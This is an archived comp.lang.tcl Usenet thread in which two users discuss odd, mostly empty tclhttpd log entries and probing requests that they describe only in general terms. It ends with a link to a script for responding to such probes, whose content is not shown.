rotten news relay - comp.lang.tcl

Subject: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Tue, 2 Jul 2024 19:10 UTC

Path: eternal-september.org!news.eternal-september.org!.POSTED!not-for-mail
From: saitology9@gmail.com (saito)
Newsgroups: comp.lang.tcl
Subject: tclhttpd logs
Date: Tue, 2 Jul 2024 15:10:32 -0400
Organization: A noiseless patient Spider
Lines: 10
Message-ID: <v61jba$1ohic$1@dont-email.me>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Date: Tue, 02 Jul 2024 21:10:34 +0200 (CEST)
Injection-Info: dont-email.me; posting-host="94ac37a15f354febb3b39c2bb7b66a1a";
logging-data="1853004"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/ymPU18Av1WDFTRSbQlBiq"
User-Agent: Mozilla Thunderbird
Cancel-Lock: sha1:+i+sLOZOyMy+rIGZ9TOAijYALXw=
Content-Language: en-US

View all headers

I wonder if anyone is familiar with tclhttpd log entries and can shed
some light on this:

Typically each log entry contains a bunch of attributes including the ip
address, a timestamp, the requested url, user agent, http code, etc.
But I am seeing an increasing number of weird entries where most of that
info is empty. The lines only include the ip address and the timestamp,
and the rest is just "- - - - -".

What does this mean?

Subject: Re: tclhttpd logs
From: Colin Macleod
Newsgroups: comp.lang.tcl
Date: Wed, 3 Jul 2024 19:00 UTC
References: 1

Path: eternal-september.org!news.eternal-september.org!cmacleod.me.uk!.POSTED!not-for-mail
From: user7@cmacleod.me.uk.invalid (Colin Macleod)
Newsgroups: comp.lang.tcl
Subject: Re: tclhttpd logs
References: <v61jba$1ohic$1@dont-email.me>
Date: Wed, 03 Jul 24 19:00:16 GMT
Message-ID: <1720033216-7@cmacleod.me.uk>
Injection-Info: cmacleod.me.uk; mail-complaints-to="newsgrouper@yahoo.com"; posting-account=user7
Injection-Date: Wed, 03 Jul 24 19:00:16 GMT
User-Agent: Newsgrouper/0.5

View all headers

saito <saitology9@gmail.com> posted:

> I wonder if anyone is familiar with tclhttpd log entries and can shed
> some light on this:
>
> Typically each log entry contains a bunch of attributes including the ip
> address, a timestamp, the requested url, user agent, http code, etc.
> But I am seeing an increasing number of weird entries where most of that
> info is empty. The lines only include the ip address and the timestamp,
> and the rest is just "- - - - -".
>
> What does this mean?

Yes I see this occasionally, got a single one yesterday, none today. I don't know what causes it though.

--
Colin Macleod.

Subject: Re: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Thu, 4 Jul 2024 01:27 UTC
References: 1 2 3 4

Path: eternal-september.org!news.eternal-september.org!.POSTED!not-for-mail
Path: eternal-september.org!news.eternal-september.org!.POSTED!not-for-mail
From: saitology9@gmail.com (saito)
From: saitology9@gmail.com (saito)
Newsgroups: comp.lang.tcl
Subject: Re: tclhttpd logs
Date: Wed, 3 Jul 2024 21:27:53 -0400
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Lines: 10
Subject: Re: tclhttpd logs
Message-ID: <v64tqp$2ela9$1@dont-email.me>
References: <v61jba$1ohic$1@dont-email.me> <1720033216-7@cmacleod.me.uk>
MIME-Version: 1.0
Date: Wed, 3 Jul 2024 21:27:53 -0400
Content-Type: text/plain; charset=UTF-8; format=flowed
Organization: A noiseless patient Spider
Content-Transfer-Encoding: 7bit
Lines: 10
Injection-Date: Thu, 04 Jul 2024 03:27:53 +0200 (CEST)
Injection-Info: dont-email.me; posting-host="c4cda02b8fdbe3373be7104cd6fd66ca";
Message-ID: <v64tqp$2ela9$1@dont-email.me>
logging-data="2577737"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19UqsaDZzyxG5lZnx94r8E1"
References: <v61jba$1ohic$1@dont-email.me> <1720033216-7@cmacleod.me.uk>
User-Agent: Mozilla Thunderbird
Cancel-Lock: sha1:ZfwGmOU7XxKgWF5hIW5Eda/0+2A=
MIME-Version: 1.0
In-Reply-To: <1720033216-7@cmacleod.me.uk>
Content-Language: en-US
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

View all headers

On 7/3/2024 3:00 PM, Colin Macleod wrote:
Injection-Date: Thu, 04 Jul 2024 03:27:53 +0200 (CEST)
>
Injection-Info: dont-email.me; posting-host="c4cda02b8fdbe3373be7104cd6fd66ca";
> Yes I see this occasionally, got a single one yesterday, none today. I don't know what causes it though.
>
logging-data="2577737"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19UqsaDZzyxG5lZnx94r8E1"

Yeah, it doesn't look kosher. I saw like 10 of them like that one after
User-Agent: Mozilla Thunderbird
another. Then I get normal entries from the same source but the
requests all appear to be hacking attempts containing shell commands
Cancel-Lock: sha1:ZfwGmOU7XxKgWF5hIW5Eda/0+2A=
with rm, cd, wget, or some .php stuff.
In-Reply-To: <1720033216-7@cmacleod.me.uk>

.
Content-Language: en-US
Xref: unconfigured comp.lang.tcl:447

On 7/3/2024 3:00 PM, Colin Macleod wrote:
>
> Yes I see this occasionally, got a single one yesterday, none today. I don't know what causes it though.
>

Yeah, it doesn't look kosher. I saw like 10 of them like that one after
another. Then I get normal entries from the same source but the
requests all appear to be hacking attempts containing shell commands
with rm, cd, wget, or some .php stuff.

Subject: Re: tclhttpd logs
From: Colin Macleod
Newsgroups: comp.lang.tcl
Date: Thu, 4 Jul 2024 08:02 UTC
References: 1 2 3

Path: eternal-september.org!news.eternal-september.org!cmacleod.me.uk!.POSTED!not-for-mail
From: user7@cmacleod.me.uk.invalid (Colin Macleod)
Newsgroups: comp.lang.tcl
Subject: Re: tclhttpd logs
References: <v61jba$1ohic$1@dont-email.me> <1720033216-7@cmacleod.me.uk> <v64tqp$2ela9$1@dont-email.me>
Date: Thu, 04 Jul 24 08:02:49 GMT
Message-ID: <1720080169-7@cmacleod.me.uk>
Injection-Info: cmacleod.me.uk; mail-complaints-to="newsgrouper@yahoo.com"; posting-account=user7
Injection-Date: Thu, 04 Jul 24 08:02:49 GMT
User-Agent: Newsgrouper/0.5

View all headers

saito <saitology9@gmail.com> posted:

>
> Yeah, it doesn't look kosher. I saw like 10 of them like that one after
> another. Then I get normal entries from the same source but the
> requests all appear to be hacking attempts containing shell commands
> with rm, cd, wget, or some .php stuff.

Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
http://paste.tclers.tk/5935

--
Colin Macleod.

Subject: Re: tclhttpd logs
From: saito
Newsgroups: comp.lang.tcl
Organization: A noiseless patient Spider
Date: Thu, 4 Jul 2024 13:53 UTC
References: 1 2 3 4

Path: eternal-september.org!news.eternal-september.org!.POSTED!not-for-mail
From: saitology9@gmail.com (saito)
Newsgroups: comp.lang.tcl
Subject: Re: tclhttpd logs
Date: Thu, 4 Jul 2024 09:53:39 -0400
Organization: A noiseless patient Spider
Lines: 8
Message-ID: <v669h3$2pkpm$1@dont-email.me>
References: <v61jba$1ohic$1@dont-email.me> <1720033216-7@cmacleod.me.uk>
<v64tqp$2ela9$1@dont-email.me> <1720080169-7@cmacleod.me.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Date: Thu, 04 Jul 2024 15:53:39 +0200 (CEST)
Injection-Info: dont-email.me; posting-host="426882b36f1974f25c978ff798009140";
logging-data="2937654"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/UMmU1Aaf10kjJF0wdZ33S"
User-Agent: Mozilla Thunderbird
Cancel-Lock: sha1:G5opcr0jDbl894OGVnG/avK8kVk=
Content-Language: en-US
In-Reply-To: <1720080169-7@cmacleod.me.uk>

View all headers

On 7/4/2024 4:02 AM, Colin Macleod wrote:
>
> Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
> http://paste.tclers.tk/5935
>

Nice! they definitely deserve it :-)

BOFH excuse #15: temporary routing anomaly

comp / comp.lang.tcl / Re: tclhttpd logs

Subject	Author
tclhttpd logs	saito
Re: tclhttpd logs	Colin Macleod
Re: tclhttpd logs	saito
Re: tclhttpd logs	Colin Macleod
Re: tclhttpd logs	saito